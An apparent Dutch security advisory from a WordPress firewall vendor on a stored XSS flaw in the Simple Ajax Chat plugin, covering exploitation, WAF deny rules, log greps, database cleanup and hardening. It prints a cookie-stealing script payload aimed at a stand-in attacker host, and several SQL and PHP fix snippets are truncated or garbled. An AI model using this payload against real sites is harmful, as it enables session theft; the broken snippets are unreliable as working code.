Kritieke XSS Fout in Simple Ajax Chat//Gepubliceerd op 2026-03-14//CVE-2026-2987

WP-FIREWALL BEVEILIGINGSTEAM

Simple Ajax Chat Vulnerability

Pluginnaam Eenvoudige Ajax Chat
Type kwetsbaarheid Cross-site scripting (XSS)
CVE-nummer CVE-2026-2987
Urgentie Medium
CVE-publicatiedatum 2026-03-14
Bron-URL CVE-2026-2987

Dringend: Ongeauthenticeerde Opgeslagen XSS in “Eenvoudige Ajax Chat” (CVE-2026-2987) — Wat WordPress-site-eigenaren Nu Moeten Doen

Een recente openbare beveiligingswaarschuwing heeft een opgeslagen Cross-Site Scripting (XSS) kwetsbaarheid onthuld in de Eenvoudige Ajax Chat WordPress-plugin (versies <= 20260217), gevolgd als CVE-2026-2987. De leverancier heeft op 2026-03-01 een patch uitgebracht; sites die niet zijn bijgewerkt blijven risico lopen. Deze kwetsbaarheid stelt een ongeauthenticeerde aanvaller in staat om JavaScript-payloads op te slaan via een parameter genaamd c, die later in de sitecontext worden weergegeven wanneer andere gebruikers (vaak gebruikers met hogere privileges) de chatoutput bekijken.

Als je Eenvoudige Ajax Chat op een WordPress-site draait — vooral op sites met bevoorrechte gebruikers die de chatoutput kunnen bekijken (beheerders, redacteuren, enz.) — lees deze post dan zorgvuldig. Ik schrijf als een WordPress-beveiligingsprofessional met ervaring in het beschermen van sites tegen kwetsbaarheden gerelateerd aan plugins. Hieronder vind je:

  • Een uitleg in gewone taal van de kwetsbaarheid en waarom deze riskant is
  • Hoe aanvallers deze kunnen misbruiken en wat de gevolgen in de echte wereld zijn
  • Onmiddellijke noodstappen die je moet nemen
  • Aanbevolen langetermijnoplossingen en veilige codefragmenten
  • WAF-mitigatieregels die je direct kunt implementeren
  • Hoe je tekenen van exploitatie kunt detecteren en opruimen als je bent getroffen
  • Waarom WP-Firewall (inclusief ons gratis Basisplan) een praktische mitigatie is terwijl je patcht

Dit is een lange post — maar het is ontworpen om je een compleet, uitvoerbaar responsplan te geven.


Korte samenvatting (als je maar 60 seconden hebt)

  • Kwetsbaarheid: Opgeslagen XSS via parameter c in Eenvoudige Ajax Chat (<= 20260217).
  • Ernst: Gemiddeld (CVSS 7.1) — maar de werkelijke impact kan ernstig zijn, afhankelijk van wie de geïnjecteerde inhoud bekijkt.
  • CVE: CVE-2026-2987.
  • Gepatcht: 2026-03-01. Update de plugin onmiddellijk naar versie 20260301 of later.
  • Als je niet onmiddellijk kunt updaten: implementeer WAF-regels om verzoeken met scriptpayloads (voorbeelden hieronder) te blokkeren, beperk de toegang tot de chat-eindpunten, of schakel de plugin uit totdat deze is gepatcht.
  • Na het patchen, zoek en verwijder eventuele opgeslagen kwaadaardige berichten en roteer inloggegevens als er bewijs is van succesvolle exploitatie.

Wat is Stored Cross-Site Scripting (opgeslagen XSS) — en waarom is dit zorgwekkend?

Opgeslagen XSS doet zich voor wanneer een aanvaller in staat is om kwaadaardige JavaScript (of HTML) in te dienen dat op de server wordt opgeslagen en vervolgens letterlijk aan andere gebruikers wordt weergegeven. In tegenstelling tot gereflecteerde XSS (dat vereist dat een gebruiker op een kwaadaardige link klikt), blijft opgeslagen XSS op de site bestaan en wordt uitgevoerd in de browser van elke gebruiker die de geïnfecteerde pagina bezoekt.

In dit geval:

  • De plugin exposeert een parameter genaamd c (gebruikt om chatinhoud in te dienen).
  • Een niet-geauthenticeerde aanvaller kan op maat gemaakte invoer verzenden met behulp van die parameter en deze laten opslaan.
  • Wanneer een andere gebruiker (mogelijk een beheerder) een pagina laadt die chatberichten weergeeft, draait de opgeslagen payload in de browser van het slachtoffer met de privileges en sessiecontext van dat slachtoffer.
  • Omdat de aanvaller mogelijk niet is geauthenticeerd, is het primaire risico dat het slachtoffer dat de chat bekijkt (vaak een bevoorrechte gebruiker) zijn sessiecookies, CSRF-tokens of admin UI gemanipuleerd krijgt — wat mogelijk leidt tot overname van de site, malware-installatie of datadiefstal.

Hoewel de initiële injectie slechts een HTTP-verzoek vereist, hangt succesvolle exploitatie doorgaans af van gebruikersinteractie (iemand die de chat bekijkt). Dat gezegd hebbende, tonen veel sites chatinhoud in admin dashboards, openbare pagina's of widgets — waardoor het aanvalsvlak wordt vergroot.


Wie loopt het grootste risico?

  • Sites die Simple Ajax Chat-versies <= 20260217 draaien en die de update van 2026-03-01 niet hebben toegepast.
  • Sites waar beheerders, redacteuren of andere ingelogde bevoorrechte gebruikers regelmatig chatinhoud of dashboards bekijken die chatoutput bevatten.
  • Sites waar de chatoutput van de plugin is ingebed in pagina's die toegankelijk zijn voor hooggeprivilegieerde gebruikers.
  • Sites zonder een WAF of andere virtuele patching.

Zelfs als de chat van je site openbaar is en alleen normale bezoekers deze zien, kan opgeslagen XSS nog steeds leiden tot compromittering van gebruikersaccounts, spam, diefstal van cookies, het omleiden van verkeer naar kwaadaardige pagina's, of persistente malware-injecties die SEO en bezoekers beïnvloeden.


Hoe een aanvaller dit zou kunnen exploiteren (praktisch voorbeeld)

  1. De aanvaller maakt een verzoek naar het chat-eindpunt, waarbij hij de c parameter instelt op een JavaScript-payload:
    • Voorbeeldpayload (simpel): <script>fetch('https://attacker.example/steal?c='+document.cookie)</script>
  2. De plugin houdt de c inhoud in de database (chatberichtopslag) zonder juiste sanitatie of codering.
  3. Later, wanneer een admin het chatgebied bekijkt (of de chat verschijnt op een dashboardwidget), parseert en voert de browser de opgeslagen JavaScript uit.
  4. De payload kan:
    • Cookies of lokale opslagtokens stelen (als ze niet beschermd zijn door HttpOnly-cookies)
    • Acties uitvoeren namens de admin (CSRF-achtig)
    • Extra scripts injecteren om malware persistent te maken of achterdeurtjes te creëren
    • De admin omleiden naar door de aanvaller gecontroleerde pagina's
    • Toetsaanslagen loggen, 2FA-tokens vastleggen of interne site-informatie opsommen

Dit is waarom opgeslagen XSS, zelfs wanneer het op papier slechts “gemiddelde” ernst heeft, vaak leidt tot incidenten met hoge impact.


Onmiddellijke stappen die je moet nemen (checklist op incidentniveau)

Als je Simple Ajax Chat op een site gebruikt:

  1. Update de plugin nu naar versie 20260301 (of later). Dat is de enige belangrijkste stap.
  2. Als je niet onmiddellijk kunt updaten, schakel de plugin uit of deactiveer deze totdat je kunt patchen.
  3. Voeg WAF-regels toe (voorbeelden hieronder) om verzoeken te blokkeren die gecodeerde of platte <script> tags, gebeurtenishandlers (onerror, onclick, enz.), of javascript: pseudo-protocollen bevatten in de c parameter.
  4. Beperk de toegang tot de chat-eindpunt:
    • Beperk op IP (als de chat intern is).
    • Vereis geverifieerde gebruikers (indien mogelijk) en controleer capaciteitscontroles.
  5. Maak een nieuwe back-up voordat je wijzigingen aanbrengt (volledige bestanden + DB), ga dan verder met mitigaties.
  6. Zoek naar opgeslagen kwaadaardige berichten en verwijder ze:
    • Zoeken naar <script>, onerror=, javascript:, base64-gecodeerde payloads en gebeurtenis handler-attributen.
  7. Controleer admin-logins, zoek naar verdachte sessies en wijzig admin-wachtwoorden en API-sleutels als je een compromis vermoedt.
  8. Scan de site op web shells, nieuwe admin-gebruikers en gewijzigde kern/plugin/thema-bestanden.
  9. Pas verhardingsmaatregelen toe: schakel HttpOnly en Secure-vlaggen in op cookies, handhaaf SameSite en overweeg tijdelijke CSP-headers om de impact van XSS te verminderen.
  10. Als een compromis is bevestigd, isoleer de site, voer forensisch onderzoek uit, herstel vanaf een schone back-up en informeer de getroffen gebruikers.

Patch versus Virtuele patching — welke te kiezen?

  • Patch (plugin-update) is de permanente oplossing. Update naar 20260301 of later.
  • Virtuele patching (WAF-regel) is een onmiddellijke tijdelijke oplossing om exploitpogingen te blokkeren totdat je kunt patchen of als er een publieke exploit circuleert.
  • Als je veel klantensites beheert en niet alles tegelijk kunt patchen, vermindert virtuele patching snel het risico.

WP-Firewall-gebruikers kunnen beheerde WAF-regels en malware-scanning inschakelen om bekende exploitpatronen te blokkeren terwijl ze plugin-updates coördineren over hun vloot.


Voorbeeld WAF-regels die je nu kunt implementeren

Hieronder staan ModSecurity-stijl voorbeelden en algemene regex-regels die gericht zijn op veelvoorkomende opgeslagen XSS-payloads en specifiek de c parameter. Dit zijn richtlijnen — test in een staging-omgeving voordat je ze in productie toepast om valse positieven te vermijden.

Belangrijk: pas de gevoeligheid aan afhankelijk van het legitieme gebruik van je site (bijv. als chat HTML-opmaak ondersteunt).

ModSecurity (v3) voorbeeld — blokkeer eenvoudige script-tags in parameter c:

# Block <script> tags in parameter "c"
SecRule ARGS:c "(?i)(<script\b|%3Cscript%3E|javascript:|onerror=|onload=|<img\b[^>]*on\w+=)" \
    "id:100001,phase:2,deny,log,msg:'Block suspected stored XSS payload in c parameter',severity:CRITICAL"

Breder regel om gecodeerde payloads te vangen:

SecRule ARGS_NAMES|ARGS|REQUEST_BODY "(?i)(%3Cscript%3E|%3C%2Fscript%3E|%3Cimg%20%7C%3Csvg%20|javascript:|data:text/html|%3Ciframe%3E)" \
    "id:100002,phase:2,deny,log,msg:'Block encoded script-like payloads',severity:CRITICAL"

Nginx (op basis van map-blokkering) voorbeeld:

# In your server block
if ($arg_c ~* "(<script\b|%3Cscript%3E|javascript:|onerror=|onload=)") {
    return 403;
}

OWASP CRS-compatibele afstemming:

  • Schakel de CRS-regels in die parameters en lichamen onderzoeken op script-tags of verdachte gebeurtenishandlers.
  • Voeg parameter-gebaseerde whitelist toe waar veilig (bijv. sta eenvoudige markdown-patronen toe maar blokkeer tags).

Tip: Vermijd te agressieve regels die onschuldige gebruikersinhoud blokkeren (bijv. toegestane HTML voor opmaak). Gebruik allowlists en afgestemde regex waar nodig.


Voorbeeld van fixes op plugin-niveau voor WordPress (wat de plugin-auteur zou moeten doen)

Als je een ontwikkelaar bent of je eigen fork onderhoudt, los de kwetsbaarheid op op twee plaatsen:

  1. Sanitize invoer bij opslaan (serverzijde).
  2. Ontsnap uitvoer bij het weergeven.

Voorbeeld: sanitize bij opslaan (PHP):

// Bij het verwerken van de chatindiening (serverzijde)

Voorbeeld: escape bij uitvoer (PHP):

// Bij het weergeven van het chatbericht;

Aanvullende serverzijde verharding:

  • Gebruik nonces voor AJAX-eindpunten: check_ajax_referer( 'sac_nonce', 'nonce' );
  • Gebruik capaciteitscontroles waar nodig: current_user_can( 'bewerk_b berichten' ) enz.
  • Gebruik voorbereide instructies als je invoert in aangepaste DB-tabellen.

Als de plugin opzettelijk opgemaakte inhoud accepteert, gebruik dan een strikte wp_kses whitelist en sanitize attribuutwaarden grondig (geen javascript: of gegevens: URI's in src/href).


Database-opruiming: hoe opgeslagen payloads veilig te vinden en te verwijderen

Voordat je iets verwijdert, maak een volledige back-up (bestanden + DB).

Zoek in de database naar verdachte inhoud. De plugin kan berichten opslaan in een aangepaste tabel, berichttype of optie — inspecteer de plugin-bron om de opslag te bepalen. Algemene zoekvoorbeelden:

MySQL — vind rijen die bevatten <script:

SELECT TABLE_NAME, COLUMN_NAME;

Zoek vervolgens in elke tabelkolom naar <script:

SELECT id, message_column;

Zoek in alle tabellen naar waarschijnlijke payloads (wees voorzichtig met het uitvoeren van grote queries op gedeelde hosts):

SELECT CONCAT(table_name,':',column_name) AS location

Om overeenkomende inhoud te verwijderen, ofwel:

  • Verwijder de verdachte rijen na handmatige controle, of
  • Sanitize de waarden van de message_column (vervang tags) met behulp van applicatielogica.

Voorbeeld (bijwerken om tags te verwijderen — kwetsbaar; geef de voorkeur aan applicatiegestuurde opschoning):

UPDATE wp_custom_chat_table;

Opmerking: REGEXP_REPLACE is mogelijk niet beschikbaar op oudere MySQL-versies. Veiliger aanpak: exporteer overeenkomsten en maak ze schoon in een gecontroleerde omgeving, en importeer ze vervolgens opnieuw.

Na opschoning:

  • Scan je site opnieuw met een malware-scanner.
  • Controleer of er geen web shells of andere backdoors zijn gemaakt.

Detectie van uitbuiting en indicatoren van compromittering (IoCs)

Zoek naar:

  • Verzoeken naar je chat-eindpunten die bevatten <script>, %3Cscript%3E, onerror=, javascript:, of verdachte base64-blobs.
  • Onverwachte admin-omleidingen of nieuwe admin-gebruikers.
  • Plotselinge wijzigingen in plugin/thema bestanden of onverwachte geplande taken (cron jobs).
  • Uitgaande verbindingen van de server naar onbekende domeinen (let op fetch/beacon URL's in logs).
  • Verdachte POST-verzoeken naar admin-ajax.php of andere eindpunten met actie waarden gerelateerd aan chatindiening.

Nuttige logs/grep-opdrachten:

# Search web server access logs for suspicious patterns in the param c
grep -i "c=%3Cscript" /var/log/nginx/access.log*
grep -i "c=<script" /var/log/nginx/access.log*

# Search for admin-ajax POST requests that might have been used to submit payloads
grep -i "admin-ajax.php" /var/log/nginx/access.log* | grep -i "action=simple_ajax_chat" 

# Search for pages containing <script in the DB export or WP uploads
mysqldump -u user -p database > dump.sql
grep -i "<script" dump.sql

Controleer ook de foutlogs van uw site en PHP-logs op anomalieën rond de tijd dat vermoedelijke exploitpogingen zijn gedaan.


Versterkende maatregelen om de impact van XSS in de toekomst te verminderen

  • Handhaaf HttpOnly en Secure-vlaggen op sessiecookies om diefstal van cookies via XSS moeilijker te maken.
  • Implementeer CSP (Content Security Policy) op een gefaseerde manier:
    • Voorbeeldheader om het risico te verminderen: Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-...'; object-src 'none';
    • Opmerking: CSP moet worden getest — het kan thema's/plugins breken.
  • Gebruik SameSite-cookie-attributen om CSRF-gebaseerde acties te weerstaan.
  • Beperk het gebruik van plugins: houd alleen plugins die u actief nodig heeft en zorg ervoor dat ze afkomstig zijn van gerenommeerde auteurs.
  • Vereis automatische updates voor kritieke plugins in uw omgeving waar mogelijk.
  • Scheid admin-toegang: gebruik een specifieke URL, IP-beperkingen, 2FA en beperk wie admin-niveau inhoud kan bekijken.
  • Bewaak de integriteit van bestanden en geplande taken op onverwachte wijzigingen.
  • Houd regelmatige back-ups bij en test de herstelprocedures.

Forensisch onderzoek & herstel na vermoedelijke compromittering

  1. Isolateer de getroffen omgeving (zet de site in onderhoudsmodus, indien mogelijk).
  2. Bewaar logs (webserver, PHP, database) voor analyse.
  3. Maak een forensische snapshot (bestanden + DB) voordat je wijzigingen aanbrengt.
  4. Identificeer de initiële toegang en reikwijdte — heeft de aanvaller alleen chatberichten geïnjecteerd, of zijn er andere bestanden gewijzigd?
  5. Verwijder opgeslagen payloads en alle kwaadaardige bestanden of achterdeurtjes.
  6. Reset alle bevoorrechte inloggegevens en API-tokens die op de site zijn gebruikt.
  7. Herinstalleer de WordPress-kern, thema's en plugins vanuit vertrouwde bronnen (of herstel vanuit een geverifieerde schone back-up).
  8. Voer malware-scans en monitoring opnieuw uit gedurende ten minste enkele dagen.
  9. Als de aanvaller persistentie-mechanismen heeft gemaakt (geplande taken, nieuwe gebruikers, gewijzigde bestanden), verwijder en valideer grondig.
  10. Overweeg professionele incidentrespons als er een overname van de site of blootstelling van gevoelige gegevens heeft plaatsgevonden.

Waarom virtueel patchen met een WAF een effectieve kortetermijnverdediging is

Wanneer een kwetsbaarheid breed wordt bekendgemaakt, kan het venster tussen bekendmaking en actieve exploitatie kort zijn. Virtueel patchen via een goed afgestelde WAF:

  • Blokkeert exploitpogingen aan de rand, voordat ze je WordPress-toepassing bereiken.
  • Vermindert ruis en biedt ademruimte om plugin-updates over meerdere sites te coördineren.
  • Is vooral nuttig voor beheerde hosting of bureau-omgevingen met honderden klantensites.

Een beheerde WAF in combinatie met geplande plugin-updates en een malware-scanner biedt gelaagde bescherming: het zal veel voorkomende payloads blokkeren en helpen bij het detecteren van pogingen die je site bereiken.


Voorbeeld van een ModSecurity-regelset afgestemd op deze waarschuwing (samenvatting)

  • Weiger verzoeken waarbij een parameter (c of een andere) bevat:
    • <script> of URL-gecodeerde equivalenten
    • javascript: pseudo-protocol
    • Evenementhandlers zoals onerror=, onload=, onclick=
    • Veelvoorkomende obfuscatiepatronen (hex, unicode codering, base64)
  • Log geblokkeerde verzoeken met voldoende metadata (IP, UA, verzoeklichaam) voor follow-up.
  • Whitelist veilige clients of bekende API-bronnen om valse positieven te verminderen.

Implementeer deze regels eerst in de monitoringsmodus (log maar sta toe), bekijk valse positieven en ga dan over naar de blokkeringmodus.


Hoe je snel je code kunt doorzoeken op onveilige uitvoer

Als je thema's of plugins onderhoudt die chatberichten weergeven, zoek dan naar niet-geëscape uitvoeroproepen:

  • Zoek naar het direct echoën van variabelen: echo $bericht;, print $bericht;
  • Vervang door escape-functies: echo esc_html( $bericht ); of echo wp_kses_post( $bericht );
  • Voor AJAX-eindpunten, zorg voor server-side sanitatie voordat je opslaat: sanitize_text_veld(), wp_kses().

Meld je aan en bescherm al je WordPress-sites met WP-Firewall

Begin met het beschermen van je site met het gratis plan van WP-Firewall

We weten dat veel site-eigenaren effectieve bescherming nodig hebben zonder een onmiddellijk budget voor premiumdiensten. Het Basis (Gratis) plan van WP-Firewall biedt je essentiële bescherming die je binnen enkele minuten kunt implementeren: een beheerde firewall, een altijd actieve WAF afgestemd op WordPress-patronen, onbeperkte bandbreedte, een malware-scanner en bescherming tegen OWASP Top 10-risico's. Het is ontworpen om je betekenisvolle mitigatie te bieden terwijl je updates en opruimingen coördineert.

Verken het gratis plan en laat je vandaag nog beschermen: https://my.wp-firewall.com/buy/wp-firewall-free-plan/

(Als je extra automatisering nodig hebt, voegen onze Standaard- en Pro-plannen automatische malwareverwijdering, IP-blacklisting, maandelijkse rapporten en automatische virtuele patching voor kritieke kwetsbaarheden toe.)


Veelgestelde vragen

V: Ik heb de plugin bijgewerkt — heb ik nog steeds een WAF nodig?
A: Ja. Updates verhelpen de kwetsbaarheid, maar een WAF biedt verdediging op meerdere niveaus, vangt exploitpogingen en helpt ongepachte of verkeerd geconfigureerde sites te beschermen.

Q: Als ik update, moet ik dan nog steeds zoeken naar kwaadaardige berichten?
A: Absoluut. Patching voorkomt toekomstige injectiepogingen via de nu verholpen kwetsbaarheid, maar het verwijdert geen inhoud die aanvallers al hebben opgeslagen. Voer de hierboven beschreven opruimstappen uit.

Q: Zal inhoudsanitatie legitieme chatopmaak verstoren?
A: Mogelijk. Als de chat opzettelijk HTML-opmaak ondersteunt, implementeer dan een strikte whitelist met wp_kses en test om toegestane markup te behouden terwijl risicovolle attributen en tags worden verwijderd.

Q: Hoe lang moet ik na een incident monitoren?
A: Ten minste enkele weken. Aanvallers proberen vaak opnieuw binnen te komen of andere zwakke plekken te exploiteren na een initiële injectie.


Slotgedachten van het WP-Firewall-team

Plugin-kwetsbaarheden zijn een van de meest voorkomende en ingrijpende aanvalsvectoren in WordPress. Deze opgeslagen XSS-kwetsbaarheid in Simple Ajax Chat benadrukt een terugkerend patroon: plugins die gebruikersgeleverde inhoud accepteren en weergeven, moeten sanitizen bij invoer en ontsnappen bij uitvoer. Zelfs niet-geauthenticeerde injecties worden gevaarlijk wanneer bevoegde gebruikers de inhoud bekijken.

Als je Simple Ajax Chat gebruikt, werk dan onmiddellijk bij naar de gepatchte versie (20260301). Als je een portfolio van sites beheert, pas dan nu WAF virtuele patches toe om het risico te verminderen en plan updates op een gecontroleerde manier. Gebruik de detectie- en opruimstappen hierboven om de integriteit van je site te verifiëren en versterk je WordPress-omgeving om de kans op herhaalde incidenten te verkleinen.

Als je praktische hulp wilt bij het beschermen van een site of een hele klantenbasis, kan onze beheerde firewall en scanner snel worden ingeschakeld — inclusief een gratis Basisplan dat essentiële WAF-bescherming biedt terwijl je patching en incidentrespons coördineert: https://my.wp-firewall.com/buy/wp-firewall-free-plan/

Blijf veilig, houd plugins up-to-date en valideer en ontsnap altijd gebruikersinvoer — dat zijn de beste verdedigingen tegen persistente XSS-aanvallen.

— WP-Firewall Beveiligingsteam


Bijlage: Snelle checklist (kopieer-plak)

  • [ ] Werk Simple Ajax Chat bij naar 20260301 of later
  • [ ] Als je niet kunt updaten, schakel dan de plugin uit of blokkeer het chat-eindpunt
  • [ ] Pas WAF-regels toe om te blokkeren <script>, javascript:, onerror patronen
  • [ ] Maak een back-up van de site (bestanden + DB) voordat je herstelt
  • [ ] Zoek in de DB naar <script, onerror, javascript: en reinig de vermeldingen
  • [ ] Draai beheerdersreferenties en API-sleutels als er een exploit wordt vermoed
  • [ ] Scan op web shells en ongeautoriseerde beheerdersgebruikers
  • [ ] Schakel HttpOnly, Secure en SameSite cookie-vlaggen in
  • [ ] Overweeg het toevoegen van een restrictieve CSP tijdens het opruimen

wordpress security update banner

Ontvang WP Security Weekly gratis 👋
Meld je nu aan
!!

Meld u aan en ontvang wekelijks de WordPress-beveiligingsupdate in uw inbox.

Wij spammen niet! Lees onze privacybeleid voor meer informatie.